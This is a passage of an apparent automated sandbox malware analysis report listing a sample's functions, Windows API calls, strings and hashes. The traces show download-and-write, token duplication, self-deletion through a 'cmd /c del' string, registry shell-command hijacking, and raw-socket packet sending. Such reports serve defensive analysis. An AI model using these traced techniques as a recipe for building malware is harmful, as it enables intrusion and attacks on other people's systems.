                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseCountHandleMutexTicklstrcat$CancelCreateErrorEventExchangeH_prologInterlockedLastObjectReleaseSingleSleepTerminateThreadWait_mbscpyatoiclosesocketexitsetsockoptstrcmpstrncpystrstrwsprintf
                                                                    • String ID: Rsjshd fzfgkqcm
                                                                    • API String ID: 553554239-3753134293
                                                                    • Opcode ID: efbbc9d8af3d7b455d687a6dc9a5cb571a86f4244b6b6a272ae7ca2361ab11e2
                                                                    • Instruction ID: 08f138826c2742ad1e90fd7b24ce07064196e1c4affbd45f6d1256da74b3e464
                                                                    • Opcode Fuzzy Hash: efbbc9d8af3d7b455d687a6dc9a5cb571a86f4244b6b6a272ae7ca2361ab11e2
                                                                    • Instruction Fuzzy Hash: 3171757280422DABEB14EBB1CC88BEE7778FF05344F5405AAE105E3192DB749A89CF55
                                                                    Function 100059A2 Relevance: 33.4, APIs: 12, Strings: 7, Instructions: 115libraryloaderfileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(wininet.dll), ref: 100059C6
                                                                    • GetProcAddress.KERNEL32(00000000,InternetOpenA), ref: 100059DD
                                                                    • GetProcAddress.KERNEL32(00000000,InternetOpenUrlA), ref: 100059F7
                                                                    • FreeLibrary.KERNEL32(00000000), ref: 10005A15
                                                                    • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 10005A30
                                                                    • memset.MSVCRT ref: 10005A4C
                                                                    • GetProcAddress.KERNEL32(?,InternetReadFile), ref: 10005A5C
                                                                    • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 10005A94
                                                                    • CloseHandle.KERNEL32(?), ref: 10005AA7
                                                                    • Sleep.KERNEL32(00000001), ref: 10005AB2
                                                                    • GetProcAddress.KERNEL32(00000000,InternetCloseHandle), ref: 10005ABE
                                                                    • FreeLibrary.KERNEL32(00000000), ref: 10005AD1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AddressProc$Library$FileFree$CloseCreateHandleLoadSleepWritememset
                                                                    • String ID: InternetCloseHandle$InternetOpenA$InternetOpenUrlA$InternetReadFile$MSIE 6.0$MZ$wininet.dll
                                                                    • API String ID: 2364563185-3604101231
                                                                    • Opcode ID: 05eef36300ddf8c3d82d9737e99534f37842e2198b646f4bdb7f3bacb91e066a
                                                                    • Instruction ID: 03bf95695c500382511aba501602f444d8238b7f92771174b141d83944f77373
                                                                    • Opcode Fuzzy Hash: 05eef36300ddf8c3d82d9737e99534f37842e2198b646f4bdb7f3bacb91e066a
                                                                    • Instruction Fuzzy Hash: 7D3137B1D0021DBEEB119FA0CCC4EEFBFB8EB462D5F104169F605A2155D7324E95CAA1
                                                                    Function 10008F5A Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 103libraryloaderprocessCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(userenv.dll), ref: 10008F6E
                                                                    • GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock), ref: 10008F7F
                                                                    • memset.MSVCRT ref: 10008F99
                                                                    • memset.MSVCRT ref: 10008FA5
                                                                    • GetCurrentProcess.KERNEL32 ref: 10008FC7
                                                                    • OpenProcessToken.ADVAPI32(00000000,000F01FF,?), ref: 10008FD7
                                                                    • DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000001,00000001,?), ref: 10008FEE
                                                                    • LoadLibraryA.KERNEL32(Kernel32.dll,WTSGetActiveConsoleSessionId), ref: 10008FFE
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 10009001
                                                                    • SetTokenInformation.ADVAPI32(?,0000000C,?,00000004), ref: 10009017
                                                                    • CreateProcessAsUserA.ADVAPI32(?,00000000,?,00000000,00000000,00000000,00000430,?,00000000,00000044,?), ref: 10009043
                                                                    • CloseHandle.KERNEL32(?), ref: 10009055
                                                                    • CloseHandle.KERNEL32(?), ref: 1000905A
                                                                    • FreeLibrary.KERNEL32(?), ref: 10009068
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: LibraryProcessToken$AddressCloseHandleLoadProcmemset$CreateCurrentDuplicateFreeInformationOpenUser
                                                                    • String ID: CreateEnvironmentBlock$D$Kernel32.dll$WTSGetActiveConsoleSessionId$userenv.dll
                                                                    • API String ID: 2806168956-609967149
                                                                    • Opcode ID: 0614323540c7b0779648bb837dc67b9d6396a1a74a4de50b86f9cfedfc4c9ffe
                                                                    • Instruction ID: b0061dd1da551715a04a27dc39b510c82f790e22057ebd98344087f86a6c2854
                                                                    • Opcode Fuzzy Hash: 0614323540c7b0779648bb837dc67b9d6396a1a74a4de50b86f9cfedfc4c9ffe
                                                                    • Instruction Fuzzy Hash: E331B2B1D0122DBAEB10EBE5CC89EDEBFBCEF09790F104056F205A6154D7B19A54DBA0
                                                                    Function 10004D57 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 114stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Window$lstrlenstrcatstrcpy$??2@ClassFindNameTextmemsetstrcmpstrlen
                                                                    • String ID: -/-$CTXOPConntion_Class$_
                                                                    • API String ID: 3465381727-591102176
                                                                    • Opcode ID: 98112882db2913dc7719aee8fa0170be0b3162692d403c660481b053825a94fd
                                                                    • Instruction ID: 579be03eab104266c88bfc42165da39d9121a5dd043f8af95e569b38c51c2b6b
                                                                    • Opcode Fuzzy Hash: 98112882db2913dc7719aee8fa0170be0b3162692d403c660481b053825a94fd
                                                                    • Instruction Fuzzy Hash: 07319DB690425DBEFB14DBA4DC45FDE7BB9EB05380F2081A6E204A5095DBB0AE808F54
                                                                    Function 1000926A Relevance: 29.9, APIs: 13, Strings: 4, Instructions: 106stringthreadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,?,00000000), ref: 100092C8
                                                                    • GetShortPathNameA.KERNEL32(?,?,00000104), ref: 100092DD
                                                                    • GetEnvironmentVariableA.KERNEL32(COMSPEC,?,00000104), ref: 100092F0
                                                                    • lstrcatA.KERNEL32(?,/c del ), ref: 10009308
                                                                    • lstrcatA.KERNEL32(?,?), ref: 10009318
                                                                    • lstrcatA.KERNEL32(?, > nul), ref: 10009326
                                                                    • ShellExecuteExA.SHELL32(?), ref: 1000935B
                                                                    • SetPriorityClass.KERNEL32(00000000,00000040), ref: 1000936F
                                                                    • GetCurrentProcess.KERNEL32(00000100), ref: 10009376
                                                                    • SetPriorityClass.KERNEL32(00000000), ref: 1000937D
                                                                    • GetCurrentThread.KERNEL32 ref: 10009381
                                                                    • SetThreadPriority.KERNEL32(00000000), ref: 10009388
                                                                    • SHChangeNotify.SHELL32(00000004,00000001,?,00000000), ref: 1000939A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Prioritylstrcat$ClassCurrentNameThread$ChangeEnvironmentExecuteFileModuleNotifyPathProcessShellShortVariable
                                                                    • String ID: > nul$/c del $<$COMSPEC
                                                                    • API String ID: 2091984646-3769844948
                                                                    • Opcode ID: 9aacd80e804f47dad66334d012e1028adeafb23ef1bf07abbc5e11af2e7fab23
                                                                    • Instruction ID: 7e0a92b81a70da4fb670468960660760b49f9f4c910edea2561a5ad9ce3330b6
                                                                    • Opcode Fuzzy Hash: 9aacd80e804f47dad66334d012e1028adeafb23ef1bf07abbc5e11af2e7fab23
                                                                    • Instruction Fuzzy Hash: 0531DDB290022DBFEB11DBA5DC88FDEBBBCEB08750F0004A6E709E6154DA705A44CF61
                                                                    Function 100085F8 Relevance: 29.8, APIs: 15, Strings: 2, Instructions: 94filelibrarysleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog.LIBCMT ref: 100085FD
                                                                    • #540.MFC42 ref: 10008611
                                                                    • memset.MSVCRT ref: 10008629
                                                                    • #860.MFC42(?), ref: 10008637
                                                                    • #940.MFC42(0000005C,?), ref: 10008641
                                                                    • #941.MFC42(?,0000005C,?), ref: 1000864C
                                                                    • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000003,00000080,00000000,?,0000005C,?), ref: 10008664
                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 10008675
                                                                    • SetFilePointer.KERNEL32(?,00000040,00000000,00000000), ref: 10008687
                                                                    • WriteFile.KERNEL32(?,?,00002710,?,00000000), ref: 100086A5
                                                                    • LoadLibraryA.KERNEL32(KERNEL32.dll,WriteFile), ref: 100086BB
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 100086C2
                                                                    • Sleep.KERNEL32(00000000), ref: 100086CB
                                                                    • CloseHandle.KERNEL32(?), ref: 100086E6
                                                                    • #800.MFC42 ref: 100086F7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: File$#540#800#860#940#941AddressCloseCreateH_prologHandleLibraryLoadPointerProcSizeSleepWritememset
                                                                    • String ID: KERNEL32.dll$WriteFile
                                                                    • API String ID: 4292767242-2763452465
                                                                    • Opcode ID: c6d7e4729b80686712db6ab09dfadce1623d7a439faba33a829cac5ccf9c4d80
                                                                    • Instruction ID: 393a3d5d2be8bd695f1223733ce34e32a12bfa1e12c1a26939b3b7ae3726d39e
                                                                    • Opcode Fuzzy Hash: c6d7e4729b80686712db6ab09dfadce1623d7a439faba33a829cac5ccf9c4d80
                                                                    • Instruction Fuzzy Hash: D13129B2900119BFFB11DFA4DC99EAE7B6DFB053D4F004125F615A6195CA31AE44CB60
                                                                    Function 0040B925 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 241stringprocessthreadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _mbscpy.MSVCRT(?,10014E04), ref: 0040B9A5
                                                                    • strlen.MSVCRT ref: 0040B9C8
                                                                    • memset.MSVCRT ref: 0040B9F6
                                                                    • strncpy.MSVCRT ref: 0040BA12
                                                                    • memset.MSVCRT ref: 0040BA30
                                                                    • _mbscpy.MSVCRT(?,?,?,00000000,00000104), ref: 0040BA3D
                                                                    • strlen.MSVCRT ref: 0040BA4C
                                                                    • _mbscpy.MSVCRT(?,10012118), ref: 0040BA5F
                                                                    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 0040BAFB
                                                                    • TerminateProcess.KERNEL32(?,00000000), ref: 0040BB16
                                                                      • Part of subcall function 0040A0CC: GetTickCount.KERNEL32 ref: 0040A0CD
                                                                      • Part of subcall function 0040A0CC: rand.MSVCRT ref: 0040A0D5
                                                                    • strlen.MSVCRT ref: 0040BBC7
                                                                    • send.WS2_32(00000000,?,00000001,00000000), ref: 0040BBD7
                                                                    • closesocket.WS2_32(00000000), ref: 0040BBDE
                                                                    • RtlExitUserThread.NTDLL(00000000), ref: 0040BBEB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _mbscpystrlen$Processmemset$CountCreateExitTerminateThreadTickUserclosesocketrandsendstrncpy
                                                                    • String ID: D$http://
                                                                    • API String ID: 2760872628-3355305149
                                                                    • Opcode ID: 6d90a3bd36a92d2d8f60477fb776a938d59329c953baea364a1ece3a50bfaf28
                                                                    • Instruction ID: df48fc9a4f4f1cd9337dbb5d2bdca2b0bb6f3b3de63731f4d4378904216a2b54
                                                                    • Opcode Fuzzy Hash: 6d90a3bd36a92d2d8f60477fb776a938d59329c953baea364a1ece3a50bfaf28
                                                                    • Instruction Fuzzy Hash: A781727290039CBAEB11D7A4CC85EDF7B7DEB04344F1001A7E608F7191DA799B948B65
                                                                    Function 100054CF Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 177stringprocessCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 100054EB
                                                                    • strlen.MSVCRT ref: 10005532
                                                                    • lstrcpyA.KERNEL32(?,?), ref: 10005560
                                                                    • memset.MSVCRT ref: 10005598
                                                                    • wsprintfA.USER32 ref: 100055B0
                                                                    • memset.MSVCRT ref: 100055BF
                                                                    • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104), ref: 10005615
                                                                    • strstr.MSVCRT ref: 1000562D
                                                                    • strstr.MSVCRT ref: 10005641
                                                                    • lstrcatA.KERNEL32(?,10012C44), ref: 1000565B
                                                                    • lstrcatA.KERNEL32(?,?), ref: 10005667
                                                                    • lstrcpyA.KERNEL32(00000000,?), ref: 1000566F
                                                                    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 100056B5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: memset$lstrcatlstrcpystrstr$CreateEnvironmentExpandProcessStringsstrlenwsprintf
                                                                    • String ID: "%1$%s\shell\open\command$D
                                                                    • API String ID: 1939072112-1634606264
                                                                    • Opcode ID: 3748261e3b27ccb4c8f63aac76c01fa1632d9f44e2639f51fda5151534af70b3
                                                                    • Instruction ID: 76675e00fb7e028575148cbfcb57ed598063ba17078261e7d2ce6e96455bdaee
                                                                    • Opcode Fuzzy Hash: 3748261e3b27ccb4c8f63aac76c01fa1632d9f44e2639f51fda5151534af70b3
                                                                    • Instruction Fuzzy Hash: 5A5141B290065DBEEB10DBE0CC89EDF777CEB05386F1044A6F605E6154DA329B898F60
                                                                    Function 1000453C Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 151networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 10004571
                                                                      • Part of subcall function 1000212F: inet_addr.WS2_32(?), ref: 10002133
                                                                      • Part of subcall function 1000212F: gethostbyname.WS2_32(?), ref: 10002141
                                                                    • htons.WS2_32(00000000), ref: 10004599
                                                                    • WSASocketA.WS2_32(00000002,00000003,000000FF,00000000,00000000,00000001), ref: 100045AA
                                                                    • wsprintfA.USER32 ref: 1000461C
                                                                    • htons.WS2_32(0000041C), ref: 1000462E
                                                                    • inet_addr.WS2_32(00000000), ref: 1000464E
                                                                    • htons.WS2_32(00000001), ref: 10004673
                                                                    • htons.WS2_32(00000000), ref: 10004680
                                                                    • htons.WS2_32(00000408), ref: 1000468B
                                                                    • memcpy.MSVCRT(?,00000045,00000014), ref: 100046A3
                                                                    • memcpy.MSVCRT(?,?,00000008,?,00000045,00000014), ref: 100046B5
                                                                    • sendto.WS2_32(?,?,0000041C,00000000,00000002,00000010), ref: 100046E2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: htons$inet_addrmemcpy$Socketgethostbynamememsetsendtowsprintf
                                                                    • String ID: %d.%d.%d.%d$E
                                                                    • API String ID: 3009681688-1172408257
                                                                    • Opcode ID: bbe9d6bdc29dc22a34e927c4e92853137b0b6fa0f6cc0262db849164574ea017
                                                                    • Instruction ID: 8ab96af3dc29ede31c09e78368a4c187233ab32581e815a21d30eb77dd882eab
                                                                    • Opcode Fuzzy Hash: bbe9d6bdc29dc22a34e927c4e92853137b0b6fa0f6cc0262db849164574ea017
                                                                    • Instruction Fuzzy Hash: D45182B5D10358BAFB11DBE4CC85BEEBA7CEF05341F00016AF204E7192DB745A458BA9
                                                                    Function 0040CDA3 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 114stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Window$_mbscat_mbscpylstrlen$??2@ClassFindNameTextmemsetstrcmpstrlen
                                                                    • String ID: CTXOPConntion_Class$_
                                                                    • API String ID: 3415961436-426622195
                                                                    • Opcode ID: 3616d5f9db49bfbc3aa64f8c88a60448a4809345c5bf48c5c3b2539a824e5c2d
                                                                    • Instruction ID: 7a075d0dd8ea738d4dadfd6ad7cae3355c276b7f5c5f6a9dcbad50ecb4f2eb27
                                                                    • Opcode Fuzzy Hash: 3616d5f9db49bfbc3aa64f8c88a60448a4809345c5bf48c5c3b2539a824e5c2d
                                                                    • Instruction Fuzzy Hash: 4431A07290421DAEEF159BA5DC85BDE7BB9EB04304F1040B6E204F5091DBB4AE948F54
                                                                    Function 0040C301 Relevance: 27.2, APIs: 18, Instructions: 155networkstringthreadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: memset$strlen$CountExitStartupThreadTickUserclosesocketconnecthtonsinet_addrmallocrandrecvsendsocket
                                                                    • String ID:
                                                                    • API String ID: 1526783793-0
                                                                    • Opcode ID: 3c2c004f80f6cf4ac9950eb19cc08853659cb7f0346b75c69a3fc865a57d5868
                                                                    • Instruction ID: 7f77a9dc25758fd181ea8b52f5367871dff61244be12a99491110818ee82e485
                                                                    • Opcode Fuzzy Hash: 3c2c004f80f6cf4ac9950eb19cc08853659cb7f0346b75c69a3fc865a57d5868
                                                                    • Instruction Fuzzy Hash: A5513BB181021CBEEB00EBA5DD89EEEBB7CEF04344F1041AAF505E72A1D7749E548B25
